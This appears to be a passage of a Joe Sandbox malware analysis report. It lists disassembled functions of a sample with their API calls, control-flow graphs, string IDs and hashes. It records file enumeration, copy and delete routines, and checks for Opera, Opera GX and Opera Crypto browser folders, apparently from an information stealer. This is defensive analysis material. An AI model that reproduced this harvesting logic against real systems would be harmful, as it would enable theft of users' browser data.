                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cc66edc914313a54b541a8a3c71df1cbca029382fcf4526fc1012e085a134ab
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6352F871900108ABDF26FBB0DC96EEE77B8BF15304F4045A5F906AE191EE34AB49CB51
                                                                                                                                                                                      Function 003532CD Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 292filestringCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 2454 3532cd-353336 call 35a2d0 wsprintfA FindFirstFileA memset * 2 2457 353692-35369e call 341301 2454->2457 2458 35333c 2454->2458 2459 353341-353355 StrCmpCA 2458->2459 2461 353671-353683 FindNextFileA 2459->2461 2462 35335b-35336f StrCmpCA 2459->2462 2461->2459 2464 353689-35368c FindClose 2461->2464 2462->2461 2465 353375-3533b1 wsprintfA StrCmpCA 2462->2465 2464->2457 2466 3533b3-3533cb wsprintfA 2465->2466 2467 3533cd-3533dc wsprintfA 2465->2467 2468 3533df-35340c memset lstrcatA 2466->2468 2467->2468 2469 35342b-353435 strtok_s 2468->2469 2470 353437-353467 memset lstrcatA 2469->2470 2471 35340e-35341f 2469->2471 2472 353572-35357c strtok_s 2470->2472 2476 353425-35342a 2471->2476 2477 3535ff-353605 2471->2477 2473 353582 2472->2473 2474 35346c-35347c PathMatchSpecA 2472->2474 2473->2477 2478 353482-353553 call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 call 34e766 DeleteFileA call 34e766 CopyFileA call 34e766 call 34fa29 call 35a350 2474->2478 2479 35356c-353571 2474->2479 2476->2469 2477->2461 2481 353607-353613 2477->2481 2521 353555-353567 call 34e766 DeleteFileA call 34e5e8 2478->2521 2522 353584-353593 2478->2522 2479->2472 2481->2464 2482 353615-35361d 2481->2482 2482->2461 2484 35361f-353666 call 341324 call 3532cd 2482->2484 2492 35366b 2484->2492 2492->2461 2521->2479 2524 35369f-3536a7 call 34e5e8 2522->2524 2525 353599-3535b9 call 34e5b4 call 3469a2 2522->2525 2524->2457 2534 3535f7-3535fa call 34e5e8 2525->2534 2535 3535bb-3535f2 call 34e57d call 341324 call 3526f8 call 34e5e8 2525->2535 2534->2477 2535->2534
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • wsprintfA.USER32 ref: 003532EC
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00353303
                                                                                                                                                                                      • memset.MSVCRT ref: 0035331C
                                                                                                                                                                                      • memset.MSVCRT ref: 0035332A
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 0035334D
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 00353367
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0035338B
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E266), ref: 0035339C
                                                                                                                                                                                      • wsprintfA.USER32 ref: 003533C2
                                                                                                                                                                                      • wsprintfA.USER32 ref: 003533D6
                                                                                                                                                                                      • memset.MSVCRT ref: 003533E8
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 003533FA
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0035342B
                                                                                                                                                                                      • memset.MSVCRT ref: 00353440
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00353455
                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00353474
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,?,0035E264,?,00000000,0035E266), ref: 00353513
                                                                                                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 0035352B
                                                                                                                                                                                        • Part of subcall function 0034FA29: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00361D84,?,?,?,0035353F,00000000), ref: 0034FA44
                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00353548
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000), ref: 0035355E
                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00353572
                                                                                                                                                                                      • FindNextFileA.KERNELBASE(?,?), ref: 0035367B
                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0035368C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$lstrcatlstrcpymemsetwsprintf$Find$Deletestrtok_s$CloseCopyCreateFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                      • String ID: %s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                      • API String ID: 824052866-1853381274
                                                                                                                                                                                      • Opcode ID: 1f1735c1810a439e3a40271367682ea3b4b550a6fae24825a0c7b2f9a1adad42
                                                                                                                                                                                      • Instruction ID: 62d44e79c34e1edf36b2ac7b13a9daf4c05707c0c2d50e1b1dbd87347df50d76
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f1735c1810a439e3a40271367682ea3b4b550a6fae24825a0c7b2f9a1adad42
                                                                                                                                                                                      • Instruction Fuzzy Hash: 56B120B290010DABDF22EBA4CC85DEE77BCFF04345F404565F919EA061EA31AB59CB61
                                                                                                                                                                                      Function 00353FEA Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 209stringfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • wsprintfA.USER32 ref: 00354005
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0035401C
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 00354049
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 00354063
                                                                                                                                                                                      • wsprintfA.USER32 ref: 00354083
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E266), ref: 00354090
                                                                                                                                                                                      • wsprintfA.USER32 ref: 003540AD
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      • wsprintfA.USER32 ref: 003540BD
                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 003540D0
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,000003E8), ref: 003540FC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0035E264), ref: 0035410A
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0035411A
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0035E264), ref: 00354128
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0035413C
                                                                                                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003541D4
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00354241
                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 0035428B
                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0035429C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectOpenPathSingleSpecThreadWaitlstrcpy
                                                                                                                                                                                      • String ID: %s\%s$%s\*$*.*$d5$f5
                                                                                                                                                                                      • API String ID: 2476262310-2865965815
                                                                                                                                                                                      • Opcode ID: 58bbe0f60ed441b85321e62e09bcd3f74b226c5b6338536ecd9c77ca54e1ac94
                                                                                                                                                                                      • Instruction ID: d96d0d125f3c25caf412bd5935161d44c55971483b8784b25010bdc37864882f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 58bbe0f60ed441b85321e62e09bcd3f74b226c5b6338536ecd9c77ca54e1ac94
                                                                                                                                                                                      • Instruction Fuzzy Hash: C4713A72900119ABDF16EBF0DD49DEE77BCBF04305F4445A5F50AEA061EA31AA89CB90
                                                                                                                                                                                      Function 00359A6B Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: UT$f5
                                                                                                                                                                                      • API String ID: 0-2751378739
                                                                                                                                                                                      • Opcode ID: c01d3318bffb665f33ef109aadae73e4cdb9b87eb1bfff5cb64df7525f9aa14f
                                                                                                                                                                                      • Instruction ID: 33b1d4f22d69e749f6def3c9272ddb2971835f3d5901a555fdbd146b51d0e758
                                                                                                                                                                                      • Opcode Fuzzy Hash: c01d3318bffb665f33ef109aadae73e4cdb9b87eb1bfff5cb64df7525f9aa14f
                                                                                                                                                                                      • Instruction Fuzzy Hash: A402E571D04749DFCF22DF64C840BAEBBB9AF44302F1544AEE84A97261DB309B89CB51
                                                                                                                                                                                      Function 003413B4 Relevance: 26.9, APIs: 12, Strings: 3, Instructions: 646fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0035E264,?,?,?,0035E264,?,?,00000000,?,00000000), ref: 0034156F
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 0034158D
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 003415A7
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,?,0035E264,?,?,?,0035E264,?,?,?,0035E264,?,?), ref: 00341690
                                                                                                                                                                                        • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 003418D2
                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 0034190E
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0034191D
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034185C
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00341B3D
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalFree.KERNEL32(?,?,0035E266), ref: 00346A23
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00341BAD
                                                                                                                                                                                        • Part of subcall function 003526F8: Sleep.KERNEL32(000003E8,?,?,?,?,00361678,003613FC,00361ECC), ref: 0035276D
                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 00341BF0
                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00341C01
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
                                                                                                                                                                                        • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectOpenPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                      • String ID: \*.*$d5$f5
                                                                                                                                                                                      • API String ID: 1356492569-872103852
                                                                                                                                                                                      • Opcode ID: 531e4315485bc0be32ed18e66c1330825977eb9fa7e74f99a87b95eef40d72a0
                                                                                                                                                                                      • Instruction ID: fd217656e117b1902cfc09c5444dd0c3734ca142add6251812bdbe3cf4d9860f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 531e4315485bc0be32ed18e66c1330825977eb9fa7e74f99a87b95eef40d72a0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3532D772900118AADF16EBA0DC96DEE73BCBF25304F4545A5F506AE091EE34BF89CB50
                                                                                                                                                                                      Function 00349B56 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 496fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0035E266,00000000,?,?), ref: 00349BB9
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E258), ref: 00349BE2
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E254), ref: 00349BFC
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Opera,0035E266,0035E266,0035E266,0035E266,0035E266,0035E266,0035E266), ref: 00349C57
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 00349C6B
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 00349C7F
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
                                                                                                                                                                                        • Part of subcall function 00349633: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0035E266,0035E266,0035E264,75DAAC90), ref: 0034967F
                                                                                                                                                                                        • Part of subcall function 00349633: StrCmpCA.SHLWAPI(?,0035E258), ref: 003496A1
                                                                                                                                                                                        • Part of subcall function 00349633: StrCmpCA.SHLWAPI(?,0035E254), ref: 003496BB
                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,?), ref: 0034A1D1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
